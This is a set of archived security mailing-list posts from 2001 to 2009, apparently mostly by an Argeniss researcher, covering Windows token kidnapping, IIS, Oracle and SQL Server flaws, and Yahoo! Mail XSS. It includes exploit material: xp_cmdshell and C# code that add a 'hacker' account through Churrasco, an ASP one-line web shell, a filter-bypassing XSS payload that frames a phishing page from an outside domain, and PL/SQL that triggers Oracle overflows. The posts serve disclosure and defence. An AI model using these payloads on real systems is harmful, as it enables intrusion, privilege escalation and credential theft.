Opening Intranets to attack by using Internet Explorer [paper]
Hi Just released a new paper I guess it will be very interesting for list members. http://nomoreroot.blogspot.com/2009/04/opening-intranets-to-attacks-by-using.html I will be glad to hear your feedback. Enjoy. Cesar.
Token Kidnapping Windows 2003 PoC exploit
(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html) It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account. Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows services accounts can impersonate. Other process (not services) that can impersonate are IIS 6 worker processes so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide shared hosting services then I would recomend to not allow users to run this kind of code from ASP. -SQL Server is a nice target for the exploit if you are a DBA and want to own Windows: exec xp_cmdshell 'churrasco net user /add hacker' -Exploiting IIS 6 with ASP .NET : ... System.Diagnostics.Process myP = new System.Diagnostics.Process(); myP.StartInfo.RedirectStandardOutput = true; myP.StartInfo.FileName=Server.MapPath(churrasco.exe); myP.StartInfo.UseShellExecute = false; myP.StartInfo.Arguments= \net user /add hacker\ ; myP.Start(); string output = myP.StandardOutput.ReadToEnd(); Response.Write(output); ... You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip Enjoy. Cesar.
Re: [Full-disclosure] iDefense Security Advisory 07.08.08: Microsoft SQL Server Restore Integer Underflow Vulnerability
Just to clarify, the following SQL Server vulnerabilities vulnerabilities: SQL Server Buffer Overrun Vulnerability - CVE-2008-0106 SQL Server Memory Corruption Vulnerability - CVE-2008-0107 Convert Buffer Overrun - CVE-2008-0086 can be exploited to take complete control of the system on Windows 2003, it doesn't matter the user account under SQL Server service is running. On Windows 2008 if the service is running under Network Service or Local Service account then full system compromise is always possible. *see http://www.argeniss.com/research/TokenKidnapping.pdf Cesar. --- On Tue, 7/8/08, iDefense Labs [EMAIL PROTECTED] wrote: From: iDefense Labs [EMAIL PROTECTED] Subject: [Full-disclosure] iDefense Security Advisory 07.08.08: Microsoft SQL Server Restore Integer Underflow Vulnerability To: [EMAIL PROTECTED], [EMAIL PROTECTED], bugtraq@securityfocus.com Date: Tuesday, July 8, 2008, 11:18 PM iDefense Security Advisory 07.08.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 08, 2008 I. BACKGROUND SQL Server is Microsoft's database server product. It supports the restoration and inspection of backups via SQL statements. For more information see the vendor's website found at the following URL. http://www.microsoft.com/sql/default.mspx
Token Kidnapping (Microsoft Security Advisory 951306) presentation available
Presentation is available at: http://www.argeniss.com/research/TokenKidnapping.pdf Exploit code won't be released for a while due to Microsoft request. Enjoy. Cesar. Be a better friend, newshound, and know-it-all with Yahoo! Mobile. Try it now. http://mobile.yahoo.com/;_ylt=Ahu06i62sR8HDtDypao8Wcj9tAcJ
[Argeniss] Data0: Next generation malware for stealing databases (Paper)
Hey, I'm releasing this new paper, not big deal but interesting. http://www.argeniss.com/research/Data0.pdf Abstract: This paper it's about Data0, a fictitious (or not) simple PoC of new malware that after it's deployed on a computer in an internal network it will automatically hack database servers and steal their data. Several techniques used by Data0 will be detailed. Data0 will be targeting Microsoft SQL Server and Oracle Database Server two of the most used database servers. While Data0 could be used by the bad guys for evil purposes, it could also be used by security professionals and organizations to determine how strong networks, workstations, database servers, etc. are against this kind of attack. This paper is not intended to be a cook book for cyber criminals, it's intended to show people that by implementing simple techniques malware can become smarter and cause a lot more damage in a very near future. Cesar. Never miss a thing. Make Yahoo your home page. http://www.yahoo.com/r/hs
[Argeniss] Hacking Databases for owning your data (paper)
Abstract: Data theft is becoming a major threat, criminals have identified where the money is. In the last years many databases from fortune 500 companies were compromised causing lots of money losses. This paper will discuss the data theft problem focusing on database attacks, we will show actual information about how serious the data theft problem is, we will explain why you should care about database security and common attacks will be described, the main part of the paper will be the demonstration of unknown and not well known attacks that can be used or are being used by criminals to easily steal data from your databases, we will focus on most used database servers: MS SQL Server and Oracle Database, it will be showed how to steal a complete database from Internet, how to steal data using a database rootkit and backdoor and some advanced database 0day exploits. We will demonstrate that compromising databases is not big deal if they haven't been properly secured. Also it will be discussed how to protect against attacks so you can improve database security at your site. http://www.argeniss.com/research/HackingDatabases.zip (Tools and exploits included) Enjoy. Cesar. Looking for earth-friendly autos? Browse Top Cars by Green Rating at Yahoo! Autos' Green Center. http://autos.yahoo.com/green_center/
[Argeniss] Practical 10 minutes security audit: Oracle Case (Paper)
Hi. Abstract: This paper will show a extremely simple technique to quickly audit a software product in order to infer how trustable and secure it is. I will show you step by step how to identify half dozen of local 0day vulnerabilities in few minutes just making a couple of clicks on very easy to use free tools, then for the technical guys enjoyment the vulnerabilities will be easily pointed out on disassembled code and detailed, finally a 0day exploit for one of the vulnerabilities will be demonstrated. While this technique can be applied to any software in this case I will take a look at the latest version of Oracle Database Server: 10gR2 for Windows, which is a extremely secure product so it will be a very difficult challenge to find vulnerabilities since Oracle is using advanced next generation tools to identify and fix vulnerabilities http://www.argeniss.com/research/10MinSecAudit.zip (PoC exploit included) Thanks. Cesar. Need Mail bonding? Go to the Yahoo! Mail QA for great tips from Yahoo! Answers users. http://answers.yahoo.com/dir/?link=listsid=396546091
The Week of Oracle Database Bugs
The Week of Oracle Database Bugs Based on the great idea of H D Moore Month of Browser Bugs and LMH Month of Kernel Bugs, we are proud to announce that we are starting on December the Week of Oracle Database Bugs (WoODB). What is the WoODB about? An Oracle Database 0day will be released every day for a week on December. Why are you doing this? We want to show the current state of Oracle software (in)security also we want to demostrate Oracle isn't getting any better at securing its products (you already know the history: two years or more to fix a bug, not fixing bugs, failing to fix bugs, lying about security efforts, etc, etc, etc.). Why are you targeting only Oracle? We have 0days for all Database software vendors but Oracle is The #1 Star when talking about lots of unpatched vulnerabilities and not caring about security. Why not the Month of Oracle Database Bugs? We could do the Year of Oracle Database Bugs but we think a week is enough to show how flawed Oracle software is, also we don't want to give away all our 0days:), anyways if you want to contribute send your Oracle 0days so this can be extended for another week or more. See: http://www.argeniss.com/woodb.html Cesar. Sponsored Link Mortgage rates near 39yr lows. $420k for $1,399/mo. Calculate new payment! www.LowerMyBills.com/lre
MS06-034 lies? IIS 6 can still be owned?
Hi all. After early getting the details of MS06-034 I thought it will be cool to build the exploits since there has been long time without any IIS exploit and our customers (see *1) will like it, so I asked the guys to build the exploits and that I will take care of the part of elevating privileges since I had some theory that there was a way to elevate privileges. What was funny is that some time later I realized that if you can upload an asp page then it's pretty simple to have a remote shell running under the same account that the exploits would run: -shell.asp (got this from xfocus.org)-- %=server.createobject(wscript.shell).exec(cmd.exe /c request(command)).stdout.readall% --- So I wonder why MS patched the vulnerability if it's pretty simple to have a remote shell on default configurations? Mabye because wscript.shell can be disabled, removed, etc. or you can't run nor upload .exe on the server, in these cases the exploit will be handy. Also MS stated: - on Mitigating Factors On IIS 5.0 and IIS 5.1, ASP enabled applications by default run in the 'Pooled Out of Process' application, which means they run in DLLHOST.exe, which is running in the context of the low privilege IWAM_machinename account. By default, ASP is not enabled on IIS 6.0. If ASP is enabled, it runs in the context of a W3WP.exe worker process running as the low privilege 'NetworkService' account. on FAQ Workarounds... -What might an attacker use the vulnerability to do? An attacker who successfully exploited this vulnerability could take complete control of the affected system. -- That's pretty confusing since they are saying IIS 5 6 runs under a low privileged accounts and then they say an attacker could take complete control...??? My theory on the elevation of privileges was in part wrong but I could elevate privileges so now the exploits can also give you a remote shell under an administrative account which I think this is why MS patched the vulnerability. While MS fixed the ASP vulnerability they didn't fixed a design flaw that allows to elevate privilges if you can run code under IIS 5 6 low privileged accounts :) So no matter if you applied the fix, if you let users to upload an run binaries from ASP pages on default settings then your server can still be owned. Cesar. (*1 http://www.argeniss.com/products.html) __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
Re: Re[2]: The Weakness of Windows Impersonation Model
Actually, I would say: a process running as a service can impersonate almost any other running processes user accounts since you can force processes conect to your service using LPC. Cesar. --- Brian L. Walche [EMAIL PROTECTED] wrote: Just one important note regarding Database Security Brief: http://www.databasesecurity.com/dbsec/db-sec-tokens.pdf Why should I never logon to a Windows database server if I've got admin privileges? We describe a little different problem for MS SQL. MS SQL gets privileged context on its own from MSDTC. So it doesn't matter if administrator was logged into database or not. MS SQL service's default state after its start is sufficient. A suggested policy to refrain admin logons will not protect for MSSQL. Additionally, to exploit this usually you no need a sleeper that waits for privileged client to logon. Impersonating processes often keep their impersonation tokens for a while. In order to exploit an attacker needs just search for token handles. The list of handles can be retrieved through Windows native API. Brian L. Walche, http://www.gentlesecurity.com Hi Brian, I wrote a paper on this subject last year, Snagging Security Tokens to Elevate Privileges (http://www.databasesecurity.com/dbsec-briefs.htm) after Tim Mullen and thrashed out a few details at Blackhat last year over a few White Russians. The paper discusses the problem in the context of database servers and examines the LogonUser() and AcceptSecurityContext() functions. I believe Longhorn/Vista will address many of issues that currently affect impersonation. Cheers, David Litchfield http://www.databasesecurity.com/ http://www.ngssoftware.com/ - Original Message - From: Brian L. Walche [EMAIL PROTECTED] To: bugtraq@securityfocus.com Sent: Tuesday, May 16, 2006 7:25 PM Subject: The Weakness of Windows Impersonation Model The Weakness of Windows Impersonation Model http://www.gentlesecurity.com/04302006.html Summary 1. Network Service accounts context is elevated to LocalSystem. 2. A context of MS SQL service running as unique user account is elevated up to LocalSystem. 3. Any services context could be elevated to LocalSystem There is an immanent risk to run network services as privileged account, e.g. LocalSystem or Administrator. The threat is widely accepted and recognized. However, most are not aware that nearly the same risk is present for a service configured to run on behalf of non-privileged account such as Network Service, Local Service or unique user. Technical Details Security implications of impersonation are not new, but are not widely recognized and understood. By definition, impersonation allows a server application to replace (impersonate) its security context (credentials) by context of client. In general, impersonation assumes a server reduces its privileges but it also imposes a threat of unauthorized privilege elevation. The attack scenario is well known and understood. An attacker terminates, pauses or crashes a privileged server application and starts its own one with the same interface. It receives requests from privileged client and impersonate. There were number of attacks reported that have used this approach with named pipes [1, 2, 3]. However, the scope is not limited to named pipes. Any communication channel that supports impersonation can be hijacked for privilege elevation purposes, including LPC, RPC, DDE, COM, etc. Named pipe interfaces are merely less opaque and easier to discover and exploit. Provided threat of impersonation led to creating of a separate privilege Impersonate a client after authentication. Therefore, since Windows XP only LocalSystem, Administrators and services have this privilege by default [4] and can impersonate to clients credentials. Regular users are not able to exploit impersonation anymore, but services (special processes managed by Service Control Manager) still can. The risk of services run as LocalSystem and Administrators is recognized, however the threat of other accounts used to run services is underestimated. Network Service, Local Service and even unique user accounts used to run a service still allow privilege elevation for intruder who successfully attacked a service. There are two attack scenarios: 1) If a service does not impersonate highly privileged clients then an attacker who breaks into such service can simulate communication interface used by privileged services. 2) If a service happen to impersonate highly privileged clients then attackers task is easier, he needs just catch up privileged client context during impersonation. Windows XP and Windows 2003 use Network Service account to run critical services such as Remote Procedure Call (RPC), which impersonate privileged
Re: [Full-disclosure] RE: Oracle, where are the patches???
I think everything about Oracle has been said, everything is in the table to show how really bad Oracle is at security, but only few people seems to get the message, I wonder if at least goverments are paying attention since national infraestructure systems are running with Oracle, what else we can do to have this sad company to start taking security seriously? So if people at .gov is hearing you should be worry about national security and start acting on Oracle, I guess .gov don't want their data easily compromised. Cesar. __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
[Argeniss] Alert - Yahoo! Mail XSS vulnerability
Yahoo! Mail XSS vulnerability
Description:
Yahoo! Mail is a very insecure and free Web Mail
service. It allows HTML messages but it has filters to
avoid malicius script being executed on users
browsers. On 17 April 2006 I received a message that
when viewed it redirected to a fake Yahoo! Mail login
web page, I could realize about this because a strange
domain was displayed on IE status bar.
When looking at the HTML code I found out that the
message was:
...Message text ...BRBRa target=_blank
href=www.blabla23.comstyle=background:url\(java/**/script:document.write('frameset
cols=100% rows=100% border=0
frameboarder=0framespacing=0frame frameborder=0
src=http://w00tynetwork.com/x//frameset'))/ap
You can see that the attacker used some tricks to
bypass filters, but we can't know all the tricks the
attacker used because some chars were removed or
replaced by the filter. That script loaded a fake
Yahoo! Mail login web page in order to steal
passwords.
Yahoo! was contacted and they responded that the issue
was going to be fixed, after that I haven't hear any
news about them. It seems that the issue was fixed
because now the same message is displayed as:
...Message text ...BRBRa target=_blank
href=www.blabla23.comstyle=background:url\(_java/**/script:document.write('xframeset
cols=100% rows=100% border=0
frameboarder=0framespacing=0xframe frameborder=0
src=http://w00tynetwork.com/x//frameset'))/ap
Now filters were improved, whenever the word
javascript appears a _ is appended at the begining,
and a x is appended at the begining of dangerous
HTML tags.
Again Yahoo! didn't released any advisory nor
contacted customers about this issue.
This issue was exploited for long time by malicious
people for stealing passwords and cookies in order to
compromise Yahoo! Mail users accounts, so it's very
important that Yahoo! Mail users change their
passwords just in case their accounts were
compromised.
Cesar.
__
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam
protection around
http://mail.yahoo.com
__
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
Re: Recent Oracle exploit is _actually_ an 0day with no patch
David is right, we also have reported hundreds of vulnerabiities to Oracle and they only fix what you report to them, they don't care to fix the same vulnerability on different portions of code, one good example is that Oracle should have eliminated SQL injection bugs since long time ago but there are still SQL injection bugs all around because they only fix bugs reported by researchers. I remember Mary Ann Davidson saying Oracle finds more than 75 percent of significant security vulnerabilities in-house (http://news.com.com/When+security+researchers+become+the+problem/2010-1071_3-5807074.html) so WTF you don't fix them! I really can't understand how customers don't demand better security to Oracle or switch to other vendor, I would like to have customers like that so you can sell very unsecure products to them and them won't ever complain so I can save billons not improving security on products and make a lot of money. PS: Look at this paper dated February 2002, amazing how Oracle efforts are visible on 2006! http://www.cgisecurity.com/database/oracle/pdf/unbreak3.pdf Cesar. --- David Litchfield [EMAIL PROTECTED] wrote: The recent Oracle exploit posted to Bugtraq (http://www.securityfocus.com/archive/1/431353) is actually an 0day and has no patch. The referenced exploit seems to use GET_DOMAIN_INDEX_METADATA with a TYPE_NAME that references an attacker-defined package with a (modified?) ODCIIndexGetMeta function. Your last example uses GET_V2_DOMAIN_INDEX_TABLES, with arguments that reference an attacker-defined package with a (modified?) ODCIIndexUtilGetTableNames function. Is this a surface-level discrepancy, or is your vector substantively different than the one in the exploit? If these are different, then is it possible that last week's exploit was actually fixed? No; the same problem occurs. This is the kind of general problem I'm speaking about. Most vendors that actually understand security will look for other bugs in the same functional area if you point out a bug. IMO, my job as a security vulnerability researcher is to highlight problem areas - i.e. areas of functionality that are rife with issues. How can Oracle fix one issue but miss the same flaw two lines later??? In this case though, we're not just talking about one flaw but several. Really, it is inconceivable, yet they, somehow, manage to do it. God forbid that any of our critical national infrastructure runs on this product oops it does :( And every version from 8 through 9 to 10 release 2 is vulnerable. That's every supported version of Oracle on every operating system. Oracle customers: honestly - Oracle are not going to listen to the likes of me - but they will listen folks like you. If you're not happy with the response you're getting from Oracle then get on the 'phone - call them up and tell them that you're not happy. Please, demand improvements. By the way, this is not an isolated incident. I have many examples to hand where Oracle have tried to fix problems in the same functional area but only whitewashed it. They should be proactively looking for similar issues in the same code just like Microsoft does. The champion of quality coding movement (http://www.cio.com/archive/031505/security.html) , who applauds ethical hacking, asks Why isn't that standard development process? I don't know... but I don't think we'll find out in the two year time frame posited; we've got less than a year to go. - Steve P.S. For those of you who are paying attention at this excruciating level of detail, it seems that David's original use of GET_DOMAIN_INDEX_METADATA in 2004 directly included the code in the NEWBLOCK argument, whereas last week's exploit was performed through an indirect reference to the code in the TYPE_NAME argument. p.p.s. Just to clarify the issues: GET_DOMAIN_INDEX_TABLES GET_DOMAIN_INDEX_METADATA GET_V2_DOMAIN_INDEX_TABLES are all vulnerable to the exploit. Cheers, David Litchfield NGSSoftware Ltd, http://www.ngssoftware.com/ +44 (0) 208 401 0070 __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
[Argeniss] Oracle Database 10gR1 Buffer overflow in VERIFY_LOG procedure
Argeniss Security Advisory Name: Oracle Database 10gR1 Buffer overflow in VERIFY_LOG procedure (DB03) Affected Software: Oracle Database Server version 10gR1 Severity: High Remote exploitable: Yes (Authentication to Database Server is needed) Credits: Esteban Martínez Fayó Date: 4/18/2006 Advisory Number: ARG040603 Details: Oracle Database Server provides the DBMS_SNAPSHOT_UTL package that includes capability to manage materialized views. This package contains the public procedure VERIFY_LOG that is vulnerable to buffer overflow. By default DBMS_SNAPSHOT_UTL has EXECUTE permission to PUBLIC so any Oracle database user can exploit this vulnerability. Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DoS (Denial of Service) killing Oracle server process. Vendor Status: Vendor was contacted and a Critical Patch Update was released. Workaround: Restrict access to the DBMS_SNAPSHOT_UTL package (See Links section). Patch Available: Although this security bug is addressed in the Critical Patch Update April 2006, for most of the affected platforms there are no patches available at this moment. Oracle informed that the missing patches would be available on 01-May-06 Links: http://www.argeniss.com/research/ARGENISS-ADV-040603.txt http://www.argeniss.com/research/Workaround-ADV-040603.sql http://www.oracle.com/technology/deploy/security/pdf/cpuapr2006.html Spam: Searching for Oracle 0days? Argeniss Ultimate 0day Exploits Pack http://www.argeniss.com/products.html Argeniss - Information Security *Application Security Experts* http://www.argeniss.com __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
[Argeniss] Alert - Yahoo! Webmail XSS
Hi.
I just got a targeted phishing attack to one of my
Yahoo email accounts, what it´s insteresting it's that
the attack exploits a Yahoo! webmail 0day XSS
vulnerability.
I'm trying to contact Yahoo right now but in the
meantime I thought it will be good to provide some
bits because the seriousness of this .
When you browse a message on Yahoo! Webmail the XSS
exploit creates a frameset and redirects to
http://w00tynetwork.com/x/ ,it's interesting that the
address bar at IE dosn´t refresh to show the actual
URL, you can only see the redirection to
http://w00tynetwork.com/x/ on IE status bar if you
have it visible.
I don't know if this vulnerability is being exploited
on the wild since it was a targeted attack, I'm sure
about this because the content of the message.
Here is an extract from the exploit so you can start
build some signatures, filtering, etc.
---
(java/**/script:document.write('frameset cols=100%
rows=100% border=0 frameboarder=0framespacing=0frame
frameborder=0
src=http://w00tynetwork.com/x//frameset'))
---
I will provide full details later when Yahoo! fix the
issue.
If security vendors are insterested on full details
plese ask for them at infoatargeniss.com
Cesar.
__
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
WLSI - Windows Local Shellcode Injection - Paper
Hi. For those who didn't attend to Black Hat Europe nor EuSecWest, here is the paper on which the presentation was based. WLSI - Windows Local Shellcode Injection Abstract: This paper describes a new technique to create 100% reliable local exploits for Windows operating systems, the technique uses some Windows operating systems design weaknesses that allow low privileged processes to insert data on almost any Windows processes no matter if they are running under high privileges. We all know that local exploitation is much easier than remote exploitation but it has some difficulties. After a brief introduction and a description of the technique, a couple of samples (Exploits for MS05-012 and MS05-040) will be provided so the reader will be able to write his/her own exploits. http://www.argeniss.com/research/WLSI.zip Enjoy. Cesar. __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
[Argeniss] Oracle Database Buffer overflows vulnerabilities in public procedures of XDB.DBMS_XMLSCHEMA{_INT}
Argeniss Security Advisory
Name: Oracle Database Buffer overflows
vulnerabilities in public procedures of
XDB.DBMS_XMLSCHEMA{_INT}
Affected Software: Oracle Database Server versions
9iR2 and 10gR1
Severity: High
Remote exploitable: Yes (Authentication to Database
Server is needed)
Credits: Esteban Martínez Fayó
Date: 1/26/2006
Advisory Number: ARG010601
Details:
Oracle Database Server provides the DBMS_XMLSCHEMA and
DBMS_XMLSCHEMA_INT Packages that include procedures to
register and delete XML schemas.
These packages contain the public procedures
GENERATESCHEMA and GENERATESCHEMAS that are vulnerable
to buffer overflow attacks.
By default XDB.DBMS_XMLSCHEMA{_INT} has EXECUTE
permission to PUBLIC so any Oracle database user can
exploit this vulnerability.
Exploitation of this vulnerability allows an attacker
to execute arbitrary code. It can also be exploited to
cause DOS (Denial of service) killing Oracle server
process.
To reproduce the vulnerabilities execute the next
PL/SQL:
SELECT
XDB.DBMS_XMLSCHEMA.GENERATESCHEMA('LongStringHere',
'OrLongStringHere') from dual;
SELECT
XDB.DBMS_XMLSCHEMA.GENERATESCHEMAS('LongStringHere',
'OrLongStringHere') from dual;
DECLARE
a SYS.XMLTYPE; -- return value
BEGIN
a := XDB.DBMS_XMLSCHEMA_INT.GENERATESCHEMA
('LongStringHere', 'OrLongStringHere', '', FALSE,
FALSE, FALSE);
END;
DECLARE
a SYS.XMLSEQUENCETYPE; -- return value
BEGIN
a := XDB.DBMS_XMLSCHEMA_INT.GENERATESCHEMAS
('LongStringHere', 'OrLongStringHere', '', '', FALSE,
FALSE);
END;
PoC Exploits:
http://www.argeniss.com/research/OraGENERATESCHEMAExploits.txt
Vendor Status:
Vendor was contacted and a patch was released.
Workaround:
Restrict access to the XDB.DBMS_XMLSCHEMA and
XDB.DBMS_XMLSCHEMA_INT packages.
Patch Available:
Apply Oracle Critical Patch Update January 2006
available at Oracle Metalink.
Links:
http://www.argeniss.com/research/ARGENISS-ADV-010601.txt
http://www.oracle.com/technology/deploy/security/pdf/cpujan2006.html
Argeniss - Information Security
*Application Security Experts*
http://www.argeniss.com
__
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
Re: FW: Windows Update - Unsafe ActiveX control (fwd)
Hi. I wouldn't consider Windows Update ActiveX as safe, the ActiveX has dangerous methods, for example it can reboot the computer. Of course the ActiveX checks for the current site and if it's not Windows Update site it won't work, but if there is some XSS hole in Windows Update site or if there is a bug in IE that allows to trick the URL, then the ActiveX becomes very dangerous. In my opinion restricting an ActiveX to a specific site only reduce the attack surface but it doesn't make an ActiveX safe. Cesar. --- Dave Ahmad [EMAIL PROTECTED] wrote: -- Forwarded message -- Date: Thu, 17 Jul 2003 XX:XX:XX To: Dave Ahmad [EMAIL PROTECTED] Subject: FW: Windows Update - Unsafe ActiveX control Hi, I would prefer not to reply to this post directly, but if possible can you please mention the following (anonymously): -- Safe for Scripting simply means that the control is safe to be used from untrusted callers. SFS controls can access files and other resources if it is in a controlled way (eg, with the consent of the user). Windows Update is safe because it only allows itself to be hosted from the Windows Update site. If you try and host the control from another domain, the control will not work. Since the Windows Update site only ever uses the control for good purposes, and requires the user's consent to install patches, etc. it is considered Safe for Scripting. _All_ ActiveX controls can access memory and registers directly, whether they are marked as safe or not, since they typically are implemented in native code ;-) Windows Update does not require you to run unsafe controls; unfortunately the generic error that appears when you disable scripting of _safe_ controls makes it sound like there are _unsafe_ controls. If you enable scripting of safe controls then the site should work fine. If you are concerned about securing the browser, I recommend that you place Windows Update in the Trusted Sites zone and run that in the Medium security mode, and run the rest of the Internet Zone in High mode, although this will break a lot of sites. __ Do you Yahoo!? SBC Yahoo! DSL - Now only $29.95 per month! http://sbc.yahoo.com
RE: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0
Same thing in AIX 4.2.1.0 and HP-UX 10.20/11.00, previously configured as Trusted System. Cordial Greetings, CVC # -Original Message- # From: Stephanie Thomas [mailto:[EMAIL PROTECTED]] # Sent: Wednesday, July 25, 2001 11:18 AM # To: Emre Yildirim; [EMAIL PROTECTED] # Subject: RE: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0 # # # Hi Emre, # # We have tested OpenBSD and NetBSD, and have found # that they do not experience this vulnerability, # even with ssh 3.0.0 installed. # # This is most likely due to the method used to encrypt the # password in /etc/passwd or /etc/shadow. # # Best Regards, # # Steph # # -Original Message- # From: Emre Yildirim [mailto:[EMAIL PROTECTED]] # Sent: Monday, July 23, 2001 5:12 PM # To: [EMAIL PROTECTED] # Cc: [EMAIL PROTECTED] # Subject: RE: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0 # # # # SSH Secure Shell 3.0.0 does not ship with any # of the operating systems mentioned, nor does the # announcement specify that it does. However, if a # user has explicitly installed SSH Secure Shell 3.0.0 # on any of the listed operating systems, they are # vulnerable to this potential exploit. # # # I don't want to drag this boring thread any longer, but in # your advisory, it stated that OpenBSD and NetBSD were # not vulnerable. So...if I install SSH 3.0.0 on one of those # (even though the already come with openssh), ssh will not # be vulnerable to this bug? Or will it? I think that part # created a little confusion. # # # Cheers # # #
Palm Pilot - How to view hidden files
The software Tiny Sheet, present in all versions of Palm Pilot, has a function called IMPORT file. Well when this function is use ALL FILES, including the hidden files protetex with password, can be imported to a Sheet.
